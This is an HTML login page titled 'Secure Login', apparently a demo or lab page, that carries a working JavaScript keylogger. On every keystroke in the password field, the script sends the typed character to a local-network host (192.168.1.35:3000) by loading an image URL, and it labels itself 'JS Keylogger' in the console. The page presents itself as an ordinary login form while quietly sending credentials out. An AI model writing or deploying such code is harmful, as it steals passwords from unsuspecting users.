<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Secure Login</title>
    <style>
        body { font-family: sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; background-color: #f0f0f0; }
        .login-form { background-color: white; padding: 20px; border-radius: 5px; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
        input[type="text"], input[type="password"] { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ddd; border-radius: 3px; box-sizing: border-box; }
        button { width: 100%; padding: 10px; background-color: #5cb85c; color: white; border: none; border-radius: 3px; cursor: pointer; }
        button:hover { background-color: #4cae4c; }

    </style>
</head>
<body>
    <div class="login-form">
        <h2>Login</h2>
        <form onsubmit="alert('Login attempt (not really submitted)'); return false;">
            <input type="text" placeholder="Username" id="username" name="username">
            <input type="password" placeholder="Password" id="password" name="password" oninput="logKeystroke(this)">
            <button type="submit">Login</button>
        </form>
    </div>

    <script>
        function logKeystroke(inputElement) {
            const currentPassword = inputElement.value;
                        if (!currentPassword) {
                return;
            }
            const lastChar = currentPassword.slice(-1);
            if (lastChar) {
                const timestamp = Date.now(); 
                const imageUrl = `http://192.168.1.35:3000/${encodeURIComponent(lastChar)}?t=${timestamp}`;
                const img = new Image();
                img.src = imageUrl;
                
                console.log("JS Keylogger sending:", imageUrl);
            }
        }
    </script>
</body>
</html>